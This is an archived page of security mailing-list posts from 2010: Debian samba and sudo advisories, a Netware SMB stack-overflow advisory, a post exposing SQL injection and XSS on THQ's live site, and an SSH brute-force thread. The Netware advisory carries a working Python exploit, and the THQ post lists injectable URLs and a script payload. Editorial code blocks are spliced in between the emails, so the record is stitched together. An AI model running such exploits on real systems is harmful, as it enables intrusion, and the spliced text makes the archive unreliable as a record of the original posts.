[Full-disclosure] [SECURITY] [DSA 2061-1] New samba packages fix arbitrary code execution

2010-06-17 Thread Nico Golde
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ---
Debian Security Advisory DSA-2061-1 secur...@debian.org
http://www.debian.org/security/  Nico Golde
June 16th, 2010  http://www.debian.org/security/faq
- ---

Package: samba
Vulnerability  : memory corruption
Problem type   : remote
Debian-specific: no
Debian bug : none
CVE ID : CVE-2010-2063

Jun Mao discovered that Samba, an implementation of the SMB/CIFS protocol
for Unix systems, does not properly handle certain offset values when
processing chained SMB1 requests.  This enables an unauthenticated attacker
to write to an arbitrary memory location, which may allow execution of
arbitrary code with root privileges or a denial of service by crashing the
samba daemon.


For the stable distribution (lenny), this problem has been fixed in
version 3.2.5-4lenny12.

This problem does not affect the versions in the testing (squeeze) and
unstable (sid) distribution.


We recommend that you upgrade your samba packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
- 

Debian (stable)
- ---

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/s/samba/samba_3.2.5-4lenny12.diff.gz
Size/MD5 checksum:   239453 262a0d71af5629b5b743a2dd7699346a
  http://security.debian.org/pool/updates/main/s/samba/samba_3.2.5-4lenny12.dsc
Size/MD5 checksum: 1834 752097289f87a23ffed0bd884a8c1093

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/s/samba/samba-doc-pdf_3.2.5-4lenny12_all.deb
Size/MD5 checksum:  6252872 5bd2b9f3ce45c28733e4736af45cfa0b
  
http://security.debian.org/pool/updates/main/s/samba/samba-doc_3.2.5-4lenny12_all.deb
Size/MD5 checksum:  7949770 92c0aa87e34926cc8d05c844f96ccdf2

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/s/samba/samba-tools_3.2.5-4lenny12_alpha.deb
Size/MD5 checksum:  5734864 a3b2a0b1a098268d7f3fb408adca0663
  
http://security.debian.org/pool/updates/main/s/samba/samba_3.2.5-4lenny12_alpha.deb
Size/MD5 checksum:  4832766 221ccfadf707e5c1e2ec35162ca5e105
  
http://security.debian.org/pool/updates/main/s/samba/libsmbclient_3.2.5-4lenny12_alpha.deb
Size/MD5 checksum:  1333498 c85f1d0e2740701be6e48fa48d5eced4
  
http://security.debian.org/pool/updates/main/s/samba/smbclient_3.2.5-4lenny12_alpha.deb
Size/MD5 checksum:  6954426 110e2b73b8c7ce273f810af64e0b131c
  
http://security.debian.org/pool/updates/main/s/samba/swat_3.2.5-4lenny12_alpha.deb
Size/MD5 checksum:  1080334 8fc3c77432c4f9a5d1626ca7b0ced0a6
  
http://security.debian.org/pool/updates/main/s/samba/libwbclient0_3.2.5-4lenny12_alpha.deb
Size/MD5 checksum:81696 6e48d5b3f4876a7e23387c409c3d343d
  
http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_3.2.5-4lenny12_alpha.deb
Size/MD5 checksum:  2573704 d370dd920eb28ff1d58f8ecf2a13d429
  
http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_3.2.5-4lenny12_alpha.deb
Size/MD5 checksum:   637646 b7fb85ef15e39bd1a9e663549d9b36a8
  
http://security.debian.org/pool/updates/main/s/samba/samba-dbg_3.2.5-4lenny12_alpha.deb
Size/MD5 checksum:  1948208 a22dbf0b9a49c79bbb3f060bb94f68a3
  
http://security.debian.org/pool/updates/main/s/samba/samba-common_3.2.5-4lenny12_alpha.deb
Size/MD5 checksum:  3730776 82de247611e9295c002923634d3ee25e
  
http://security.debian.org/pool/updates/main/s/samba/smbfs_3.2.5-4lenny12_alpha.deb
Size/MD5 checksum:  1462704 ee4f7318a9c09923ff9819e1225dfa53
  
http://security.debian.org/pool/updates/main/s/samba/winbind_3.2.5-4lenny12_alpha.deb
Size/MD5 checksum:  3269808 5cc94c8ffe70c5eb15581649d19ea4ef

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_3.2.5-4lenny12_amd64.deb
Size/MD5 checksum:   628118 03a960adaf8f29de55ef7803272808c4
  
http://security.debian.org/pool/updates/main/s/samba/libsmbclient_3.2.5-4lenny12_amd64.deb
Size/MD5 checksum:  1359472 e4ec2ceae3e01f0c7252970c38f9db35
  
http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_3.2.5-4lenny12_amd64.deb
Size/MD5 checksum:  1953836 95004a2

[Full-disclosure] stratsec Security Advisory SS-2010-006: Netware SMB Remote Stack Overflow

2010-06-17 Thread stratsec Advisories
===
Stratsec Security Advisory: SS-2010-006 
===

Title:           Netware SMB Remote Stack Overflow
Version:         1.0
Issue type:      Stack Overflow
Affected vendor: Novell
Release date:    17/06/2010
Discovered by:   Laurent Gaffié
Issue status:    Patch available

===

Summary
---

A vulnerability exists in the Netware CIFS.NLM driver which allows an attacker
to trigger a kernel stack overflow by sending a specific 'Session Setup AndX'
request. Successful exploitation of this issue will result in remote code
execution with kernel privileges. Failed attempts may result in a remote denial
of service.


Description
---
The Server Message Block (SMB) protocol, also known as Common Internet File
System (CIFS), is an application-layer protocol that provides shared access
to files, printers and inter-process communication (IPC). It also serves as a
transport for Distributed Computing Environment / Remote Procedure Call
(DCE/RPC) operations. Once the SMB dialect has been negotiated, the client
sends a 'Session Setup AndX' request to establish a session before it can
connect to a specific share. By sending a specially crafted request containing
a long 'AccountName' value, it is possible to trigger a kernel stack overflow.
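To make the request layout described above concrete, the following added example (it is not stratsec's code and not the proof of concept further down) builds a minimal NetBIOS-framed SMB1 'Session Setup AndX' request in the NT LM 0.12 layout (13 parameter words, OEM password only, nothing chained via AndXCommand) and parses one back, pulling out the AccountName so that an overlong value can be flagged on the wire. The field values, the NativeOS/NativeLanMan strings and the 64-byte threshold are assumptions for illustration, not figures taken from the advisory; the parser also rejects a NetBIOS length that does not match the body it frames.

```python
import struct
from typing import Dict, Tuple

SMB_MAGIC = b"\xffSMB"
SMB_COM_SESSION_SETUP_ANDX = 0x73
SMB_COM_NONE = 0xFF          # AndXCommand value meaning "nothing chained"
SMB_HEADER_LEN = 32
SETUP_WORDS_FMT = "<BBHHHHIHHIIH"   # 13 parameter words + ByteCount (28 bytes)
CAP_UNICODE = 0x4


def build_session_setup_andx(account_name: bytes, oem_password: bytes = b"",
                             domain: bytes = b"WORKGROUP") -> bytes:
    """Build a NetBIOS-framed SMB1 Session Setup AndX request (NT LM 0.12 layout,
    OEM password only, no Unicode, no signing).  Constructed for this example."""
    header = SMB_MAGIC + struct.pack(
        "<BIBHH8sHHHHH",
        SMB_COM_SESSION_SETUP_ANDX,  # Command
        0,                           # Status
        0x18,                        # Flags: canonical, case-insensitive paths
        0x0001,                      # Flags2: long names (Unicode bit clear)
        0,                           # PIDHigh
        b"\x00" * 8,                 # SecurityFeatures (no signing)
        0,                           # Reserved
        0, 0x1234, 0, 1,             # TID, PID, UID (none yet), MID
    )
    # Data block: OEM password, then four NUL-terminated SMB_STRINGs.
    data = (oem_password + account_name + b"\x00" + domain + b"\x00"
            + b"Unix\x00" + b"example\x00")       # NativeOS, NativeLanMan (assumed)
    words = struct.pack(
        SETUP_WORDS_FMT,
        SMB_COM_NONE, 0, 0,      # AndXCommand, AndXReserved, AndXOffset
        0x1104, 2, 0,            # MaxBufferSize, MaxMpxCount, VcNumber
        0,                       # SessionKey
        len(oem_password), 0,    # OEMPasswordLen, UnicodePasswordLen
        0, 0,                    # Reserved, Capabilities (CAP_UNICODE clear)
        len(data),               # ByteCount
    )
    smb = header + bytes([13]) + words + data
    return struct.pack(">I", len(smb)) + smb   # NBSS: type 0, 3-byte length


def _cstring(buf: bytes, pos: int) -> Tuple[bytes, int]:
    end = buf.find(b"\x00", pos)
    if end < 0:
        raise ValueError("unterminated SMB_STRING")
    return buf[pos:end], end + 1


def parse_session_setup_andx(packet: bytes) -> Dict[str, object]:
    """Parse a NetBIOS-framed SMB1 Session Setup AndX request (OEM strings only).
    Raises ValueError on framing or length inconsistencies."""
    if len(packet) < 4 + SMB_HEADER_LEN + 1 + 28:
        raise ValueError("packet too short")
    nbss_len = struct.unpack(">I", packet[:4])[0] & 0x00FFFFFF
    smb = packet[4:]
    if nbss_len != len(smb):
        raise ValueError(f"NBSS length {nbss_len} != body length {len(smb)}")
    if smb[:4] != SMB_MAGIC or smb[4] != SMB_COM_SESSION_SETUP_ANDX:
        raise ValueError("not a Session Setup AndX request")
    if smb[SMB_HEADER_LEN] != 13:
        raise ValueError(f"unexpected WordCount {smb[SMB_HEADER_LEN]}")
    (andx_cmd, _rsv, _andx_off, _max_buf, _max_mpx, _vc, _key, oem_len, uni_len,
     _rsv2, caps, byte_count) = struct.unpack_from(SETUP_WORDS_FMT, smb, SMB_HEADER_LEN + 1)
    data = smb[SMB_HEADER_LEN + 1 + 28:][:byte_count]   # chained commands may follow
    if len(data) != byte_count:
        raise ValueError(f"ByteCount {byte_count} exceeds the bytes present")
    if caps & CAP_UNICODE:
        raise ValueError("UTF-16LE strings are not handled by this example")
    pos = oem_len + uni_len
    if pos > len(data):
        raise ValueError("password lengths exceed ByteCount")
    account, pos = _cstring(data, pos)
    domain, pos = _cstring(data, pos)
    native_os, pos = _cstring(data, pos)
    native_lm, pos = _cstring(data, pos)
    return {"andx_command": andx_cmd, "account_name": account, "domain": domain,
            "native_os": native_os, "native_lanman": native_lm}


def account_name_too_long(packet: bytes, limit: int = 64) -> bool:
    """Detection check: True when the AccountName exceeds `limit` bytes
    (the limit is an illustrative assumption, not a figure from the advisory)."""
    return len(parse_session_setup_andx(packet)["account_name"]) > limit


if __name__ == "__main__":
    for name in (b"alice", b"A" * 200):
        pkt = build_session_setup_andx(name)
        print(len(pkt), "bytes, overlong AccountName:", account_name_too_long(pkt))
```

The same parser applied to a capture will refuse the PoC below on its NetBIOS length alone, which is worth knowing before tuning a threshold: a sensor that drops malformed frames never sees the name.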


Impact
--

A remote attacker may be able to execute code with kernel privileges on
affected Netware systems. Failed attempts will result in a denial of service.


Affected products
-

Netware version 6.5 SP8 and prior.


Proof of concept


import sys
from socket import AF_INET, SOCK_STREAM, socket

if len(sys.argv) <= 1:
    sys.exit('usage: python netware.py IP_ADDR')

host = (sys.argv[1], 139)      # NetBIOS session service
payload = b"A" * 200           # overlong AccountName that overflows the kernel stack

# SMB_COM_NEGOTIATE (0x72) request listing the dialects up to "NT LM 0.12".
packetnego = (
    b"\x00\x00\x00\x9a"        # NetBIOS session message: type 0, length 0x9a
    b"\xff\x53\x4d\x42\x72\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc3\x15\x00\x00"
    b"\x01\x3d\x00\x77\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52"
    b"\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02"
    b"\x4d\x49\x43\x52\x4f\x53\x4f\x46\x54\x20\x4e\x45\x54\x29\x4f"
    b"\x52\x4b\x53\x20\x33\x2e\x30\x00\x02\x44\x4f\x53\x20\x4c\x4d"
    b"\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x44\x4f\x53\x20\x4c\x41"
    b"\x4e\x4d\x20\x4e\x32\x2e\x31\x00\x02\x57\x69\x6e\x64\x6f\x77"
    b"\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70"
    b"\x73\x20\x33\x2e\x31\x61\x00\x02\x4e\x54\x20\x4c\x4d\x20\x30"
    b"\x2e\x31\x32\x00"
)

# SMB_COM_SESSION_SETUP_ANDX (0x73) with SMB_COM_TREE_CONNECT_ANDX (0x75) chained
# via AndXCommand; the payload is spliced into the username field.  The NetBIOS
# length field is kept exactly as posted (0x00013e = 318 bytes) although the body
# that follows it is 368 bytes once the 200-byte payload is included.
packetsession = (
    b"\x00\x00\x01\x3e"
    b"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf9\x19\x01\x00\x81\x61"
    b"\x0d\x75\x00\x7a\x00\x68\x0b\x32\x00\x00\x00\x00\x00\x00\x00\x18"
    b"\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x3d\x00\x28\xd4\xce"
    b"\xd7\x93\xc8\x8b\x16\x5f\x42\x2a\x7a\xfd\x15\x7a\xfd\x15\x7a\xfd" + payload +
    b"\xef\xa5\x42\x5e\x5c\x2d\x4b\x1a\x1c\x59\x4f\x00\x57\x4f\x52\x4b"
    b"\x47\x52\x4f\x55\x50\x00\x57\x69\x6e\x64\x6f\x77\x73\x20\x34\x2e"
    b"\x30\x00\x57\x69\x6e\x64\x6f\x77\x73\x20\x34\x2e\x30\x00\x04\xff"
    b"\x00\x00\x00\x02\x00\x01\x00\x1f\x00\x00\x5c\x5c\x57\x49\x4e\x2d"
    b"\x45\x37\x4a\x30\x4f\x4e\x49\x4d\x53\x45\x33\x5c\x55\x53\x45\x52"
    b"\x53\x00\x3f\x3f\x3f\x3f\x3f\x00"
)

# Chained Session Setup AndX + Tree Connect AndX; field = username, basic
# stack overflow.
s = socket(AF_INET, SOCK_STREAM)
s.connect(host)
s.send(packetnego)
s.send(packetsession)
s.close()
print("done !")


Solution


Apply NSS update located at: 
* http://download.novell.com/Download?buildid=tMWCI1cdI7s~

This patch has not been verified by stratsec.


Response timeline
-

* 07/02/2010 - Issue discovered.
* 10/02/2010 - Vendor notified.
* 10/02/2010 - Vendor acknowledged receipt of advisory.
* 11/02/2010 - Vendor confirmed issue presence.
* 16/06/2010 - Patch released by vendor.
* 17/06/2010 - stratsec advisory published.

References
--

* Vendor advisory: http://download.novell.com/Download?buildid=tMWCI1cdI7s~

===

About stratsec
--
Stratsec, specialises in providing information security consulting and testing
services for government and commercial clients. Established in 2004, we are
now one of the leading independent information security companies in the
Australasian and SE-Asian region, with offices throughout Australia and in
Singapore and Malaysia. 

For more information, please visit our website at http://www.stratsec.net/ 

===

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Congratulations Andrew

2010-06-17 Thread Brian Keefer
On Jun 16, 2010, at 11:56 AM, wilder_jeff Wilder wrote:

> 
> By that same standard.. if you leave your house unlocked does that give 
> someone the right to enter it?
> 
> just my thought
> s

It wasn't an unlocked house.  It was a table on the sidewalk with all the 
neighbors' Girl Scout cookie order sheets on it.  Someone just happened to 
pick up not only their order sheet, but everyone else's too.

Think you could get a theft prosecution for that?

--
chort

[Full-disclosure] THQ website has multiple SQL injection bugs, and a reflected XSS

2010-06-17 Thread Harry Balls
This is pretty much because I want to embarrass these assholes. See: 
http://gamepolitics.com/2010/06/14/exec-thq-anti-used-game-initiative-could-make-everyone-happy

SQLi 1: 
http://www.thq.com/us/mythq/register?contentType=GAMEALERT&alertGame='4896

This one is pretty obvious. It's an injection via $_GET. The funniest part is 
that they don't just allow injection: they serve up the whole PHP source of the 
page for you, giving you table names and the actual syntax of the query being 
used.

SQLi 2:
The next one is an injection via POST in their registration form here: 
http://www.thq.com/us/mythq/register

I used Burp Suite to inject it by editing the HTTP requests, but you can probably 
just enter whatever you want right in the form. I used the UK subdomain for 
testing: http://uk.thq.com/uk/mythq/register. This one also shows the source.

Next one is your typical reflected XSS:

http://www.thq.com/us/search/index?keyw=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E

I hope this is enough to put off anyone who was thinking of buying shit from 
them.
Would you trust this company with your credit card information when they can't 
even properly sanitize a registration form?
These probably aren't even the only security bugs on their site. This is just 
after 10 minutes of pentesting. Do yourself a favor and stay far far away from 
this company. They have no clue about security and obviously don't give a shit 
about their customers.

BOYCOTT THQ
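What the two findings in the post above come down to in code, as an added example that is not THQ's PHP (the post says the source is disclosed but does not reproduce it): a query built by string concatenation beside its parameterised form, and a search term reflected raw beside one passed through an HTML escaper. The table, its rows and the Python/sqlite3 stand-in for a PHP/MySQL page are constructed for the example; the probe values are the ones from the post.

```python
import html
import sqlite3
from typing import Dict, List


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the site's game-alert table (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE game_alerts (id INTEGER PRIMARY KEY, game_id TEXT, title TEXT)")
    conn.executemany("INSERT INTO game_alerts (game_id, title) VALUES (?, ?)",
                     [("4896", "Example Title A"), ("5100", "Example Title B")])
    conn.commit()
    return conn


def lookup_alert_vulnerable(conn: sqlite3.Connection, alert_game: str) -> List[str]:
    """The request parameter is pasted into the SQL text, as in the GET injection
    from the post: one stray quote ('4896) breaks the statement, and a tautology
    rewrites the WHERE clause."""
    sql = f"SELECT title FROM game_alerts WHERE game_id = '{alert_game}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_alert_safe(conn: sqlite3.Connection, alert_game: str) -> List[str]:
    """Parameterised: the value is bound to a placeholder and never parsed as SQL."""
    return [row[0] for row in conn.execute(
        "SELECT title FROM game_alerts WHERE game_id = ?", (alert_game,))]


def render_search_vulnerable(keyw: str) -> str:
    """Reflects the search term into the page verbatim."""
    return f"<p>Results for {keyw}</p>"


def render_search_safe(keyw: str) -> str:
    """Escapes the HTML metacharacters (quotes included) so the term is text, not markup."""
    return f"<p>Results for {html.escape(keyw, quote=True)}</p>"


def demo() -> Dict[str, object]:
    """Run the probes from the post against both versions and collect the results."""
    conn = make_db()
    out: Dict[str, object] = {}
    quote_probe = "'4896"                          # alertGame='4896 from the post
    try:
        lookup_alert_vulnerable(conn, quote_probe)
        out["vulnerable_errors_on_quote"] = False
    except sqlite3.OperationalError:
        out["vulnerable_errors_on_quote"] = True   # the error a chatty page echoes with its source
    out["safe_on_quote"] = lookup_alert_safe(conn, quote_probe)        # []: no such id
    tautology = "x' OR '1'='1"
    out["vulnerable_tautology"] = lookup_alert_vulnerable(conn, tautology)   # every row
    out["safe_tautology"] = lookup_alert_safe(conn, tautology)               # []
    xss = "<script>alert(document.cookie);</script>"                  # keyw= from the post
    out["vulnerable_reflects_script"] = "<script>" in render_search_vulnerable(xss)
    out["safe_reflects_script"] = "<script>" in render_search_safe(xss)
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The same split applies to the POST form: binding every field is what removes the bug, while turning off error display only hides the source leak the post describes.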




Re: [Full-disclosure] Congratulations Andrew

2010-06-17 Thread huj huj huj
just bugger off then
you will not be missed

2010/6/17 ghost 

> To sum up what full-disclosure has become:
>
> random arrested and charged with drug possession = 30+ posts
>
> unreal ircd backdoored = 4? responses.
>
>
> *sigh*
>
>

[Full-disclosure] [SECURITY] [DSA 2062-1] New sudo packages fix environment sanitization bypass vulnerability

2010-06-17 Thread Giuseppe Iuculano
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- 
Debian Security Advisory DSA-2062-1  secur...@debian.org
http://www.debian.org/security/Giuseppe Iuculano
June 17, 2010 http://www.debian.org/security/faq
- 

Package: sudo
Vulnerability  : missing input sanitization
Problem type   : local
Debian-specific: no
CVE Id : CVE-2010-1646
Debian Bug : 585394


Anders Kaseorg and Evan Broder discovered a vulnerability in sudo, a
program designed to allow a sysadmin to give limited root privileges to
users, that allows a user who has sudo permissions for certain programs to
run those programs with an untrusted value of PATH.
This could possibly lead to certain intended restrictions being bypassed,
such as the secure_path setting.


For the stable distribution (lenny), this problem has been fixed in
version 1.6.9p17-3.

For the unstable distribution (sid), this problem has been fixed in
version 1.7.2p7-1, and will migrate to the testing distribution (squeeze)
shortly.


We recommend that you upgrade your sudo package.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.
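Both Debian advisories on this page list a size and MD5 for every file so that a package fetched with wget can be checked before dpkg -i. The helper below, added here and not part of either advisory, parses those URL / "Size/MD5 checksum" pairs and checks a downloaded file against them; the package bytes in the demo are constructed, and the regular expression's whitespace handling is an assumption about how the lines were wrapped. Keep the caveat in mind: MD5 here only catches corrupted or truncated downloads. Anyone who can substitute the .deb can substitute an unsigned checksum list too, so the PGP signature on the advisory mail (or apt's signed Release file) is what actually authenticates the package.

```python
import hashlib
import re
from typing import Dict, NamedTuple, Optional


class PackageEntry(NamedTuple):
    url: str
    size: int
    md5: str


# One entry is a URL followed by "Size/MD5 checksum: <size> <md5>", as printed
# in the advisories above; the whitespace between them varies after extraction.
# A truncated digest (fewer than 32 hex digits) deliberately fails to match.
_ENTRY_RE = re.compile(
    r"(?P<url>https?://\S+)\s+Size/MD5 checksum:\s*(?P<size>\d+)\s+(?P<md5>[0-9a-f]{32})\b"
)


def parse_advisory(text: str) -> Dict[str, PackageEntry]:
    """Return {file name: PackageEntry} for every usable URL/checksum pair in `text`."""
    entries: Dict[str, PackageEntry] = {}
    for m in _ENTRY_RE.finditer(text):
        url = m.group("url")
        entries[url.rsplit("/", 1)[-1]] = PackageEntry(url, int(m.group("size")), m.group("md5"))
    return entries


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def verify_package(entry: PackageEntry, data: bytes) -> Optional[str]:
    """Return None if `data` matches the advisory entry, otherwise the reason.

    Size is compared first: it is free and catches the common case of a
    truncated download before any hashing is done.
    """
    if len(data) != entry.size:
        return f"size mismatch: advisory says {entry.size}, file is {len(data)}"
    digest = md5_hex(data)
    if digest != entry.md5:
        return f"md5 mismatch: advisory says {entry.md5}, file is {digest}"
    return None


if __name__ == "__main__":
    # Constructed stand-in for a downloaded .deb and the matching advisory lines.
    fake_deb = b"!<arch>\nnot a real package, just example bytes\n"
    advisory = (
        "  http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.9p17-3_i386.deb\n"
        f"Size/MD5 checksum:   {len(fake_deb)} {md5_hex(fake_deb)}\n"
    )
    entry = parse_advisory(advisory)["sudo_1.6.9p17-3_i386.deb"]
    print(verify_package(entry, fake_deb))          # None: matches
    print(verify_package(entry, fake_deb[:-1]))     # size mismatch
```

For a single file, md5sum on the command line and a comparison by eye does the same job; the parser earns its keep when a whole architecture's set of packages is checked at once.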


Debian GNU/Linux 5.0 alias lenny
- 

Debian (stable)
- ---

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.9p17-3.diff.gz
Size/MD5 checksum:22680 0dbccca405985efdbad35890d3c3f8a1
  http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.9p17-3.dsc
Size/MD5 checksum: 1636 c9e25ecaf202c03ef25df5ae1ff3f275
  http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.9p17.orig.tar.gz
Size/MD5 checksum:   593534 60daf18f28e2c1eb7641c4408e244110

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/s/sudo/sudo-ldap_1.6.9p17-3_alpha.deb
Size/MD5 checksum:   203036 027ea3be387d79ef0adffd7514a6b11a
  http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.9p17-3_alpha.deb
Size/MD5 checksum:   190120 8fc466a554ad087e44a0ea758269bce7

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/s/sudo/sudo-ldap_1.6.9p17-3_amd64.deb
Size/MD5 checksum:   200832 4c918da4eaee54e671ef187f3dcd16c2
  http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.9p17-3_amd64.deb
Size/MD5 checksum:   188460 5a10ab0f58b10b3ffefe8e7a236e7b15

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.9p17-3_arm.deb
Size/MD5 checksum:   179384 95fff379279d44e59f0ff19cd4f21a65
  
http://security.debian.org/pool/updates/main/s/sudo/sudo-ldap_1.6.9p17-3_arm.deb
Size/MD5 checksum:   191446 67b5305265b70b5726c2e5cfbf6f89e0

armel architecture (ARM EABI)

  
http://security.debian.org/pool/updates/main/s/sudo/sudo-ldap_1.6.9p17-3_armel.deb
Size/MD5 checksum:   190316 d1862bbf805e192318e8db91e6d95463
  http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.9p17-3_armel.deb
Size/MD5 checksum:   178966 fa472c7551045fdd8f5c4c0c2a2fc423

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/s/sudo/sudo-ldap_1.6.9p17-3_hppa.deb
Size/MD5 checksum:   198898 679645aea800265e36c76b6c0f4e982a
  http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.9p17-3_hppa.deb
Size/MD5 checksum:   186044 9a4a50c7782b24bdfd91e66953476d3b

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.9p17-3_i386.deb
Size/MD5 checksum:   176354 7afb577238bcf9d9b65ca69d70096157
  
http://security.debian.org/pool/updates/main/s/sudo/sudo-ldap_1.6.9p17-3_i386.deb
Size/MD5 checksum:   188014 ce2cad49130d76a8190e9a2171cd8cd4

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.9p17-3_ia64.deb
Size/MD5 checksum:   220268 374351a7d4acd6b27c3d8ab8b4e57939
  
http://security.debian.org/pool/updates/main/s/sudo/sudo-ldap_1.6.9p17-3_ia64.deb
Size/MD5 checksum:   235608 e69fc1ddc776149c10d439e6a4e1ec99

mips architecture (MIPS (Big Endian))

  
http://security.debian.org/pool/updates/main/s/sudo/sudo-ldap_1.6.9p17-3_mips.deb
Size/MD5 checksum:   197388 3e580a7b5accf60fa0db06e22e39d944
  http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.9p17-3_mips.deb
Size/MD5 checksum:   184548 58e5cadabcb33baeafd73dfeb602b8c

[Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Gary Baribault
Hello list,

I have a strange situation and would like information from the
list members. I have three Linux boxes exposed to the Internet. Two of
them are on cable modems, and both have two services that are publicly
available. In both cases, I have SSH and named running and available
to the public. Before you folks say it, yes I run SSH on TCP/22 and no
I don't want to move it to another port, and no I don't want to
restrict it to certain source IPs.

Both of these systems are within one /21 and get attacked
regularly. I run Denyhosts on them, and update the central server once
an hour with attacking IPs, and obviously also download the public
hosts.deny list.

These machines get hit regularly, so often that I don't really
care, it's fun to make the script kiddies waste their time! But in
this instance, only my home box is being attacked... someone is
burning a lot of cycles and hosts to do a distributed dictionary
attack on my one box! The named daemon is non recursive, properly
configured, up to date and not being attacked.

Is anyone else seeing this type of attack? Or is someone really
targeting MY box?

Thanks


Gary Baribault
Courriel: g...@baribault.net
GPG Key: 0x685430d1
Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1



Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread dink

Have you ever considered obfuscated-openssh?

http://github.com/brl/obfuscated-openssh

I have a modified version of PuTTY available for it...

http://www.mrhinkydink.com/potty.htm

Still... you should change the freakin' port.

 Original Message 
Subject: [Full-disclosure] targetted SSH bruteforce attacks
From: Gary Baribault 
Date: Thu, June 17, 2010 7:48 am
To: full-disclosure@lists.grok.org.uk

Hello list,

 I have a strange situation and would like information from the
list members. I have three Linux boxes exposed to the Internet. Two of
them are on cable modems, and both have two services that are publicly
available. In both cases, I have SSH and named running and available
to the public. Before you folks say it, yes I run SSH on TCP/22 and no
I don't want to move it to another port, and no I don't want to
restrict it to certain source IPs.

 Both of these systems are within one /21 and get attacked
regularly. I run Denyhosts on them, and update the central server once
an hour with attacking IPs, and obviously also download the public
hosts.deny list.

 These machines get hit regularly, so often that I don't really
care, it's fun to make the script kiddies waste their time! But in
this instance, only my home box is being attacked... someone is
burning a lot of cycles and hosts to do a distributed dictionary
attack on my one box! The named daemon is non recursive, properly
configured, up to date and not being attacked.

 Is anyone else seeing this type of attack? Or is someone really
targeting MY box?

Thanks


Gary Baribault
Courriel: g...@baribault.net
GPG Key: 0x685430d1
Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1



Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Gary Baribault
I just knew that people would say that, and that's why I specified
that I WANT to keep SSH on 22 .. it's fun to see the attacks, and it's
interesting to see new types of attacks. The question here is whether
anyone else is seeing such a targeted attack.

Gary Baribault
Courriel: g...@baribault.net
GPG Key: 0x685430d1
Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1


On 06/17/2010 08:28 AM, d...@mrhinkydink.com wrote:
>
> Have you ever considered obfuscated-openssh?
>
> http://github.com/brl/obfuscated-openssh
>
> I have a modified version of PuTTY available for it...
>
> http://www.mrhinkydink.com/potty.htm
>
> Still... you should change the freakin' port.
>
>  Original Message  Subject: [Full-disclosure]
> targetted SSH bruteforce attacks From: Gary Baribault
>  Date: Thu, June 17, 2010 7:48 am To:
> full-disclosure@lists.grok.org.uk
>
> Hello list,
>
> I have a strange situation and would like information from the list
> members. I have three Linux boxes exposed to the Internet. Two of
> them are on cable modems, and both have two services that are
> publicly available. In both cases, I have SSH and named running and
> available to the public. Before you folks say it, yes I run SSH on
> TCP/22 and no I don't want to move it to another port, and no I
> don't want to restrict it to certain source IPs.
>
> Both of these systems are within one /21 and get attacked
> regularly. I run Denyhosts on them, and update the central server
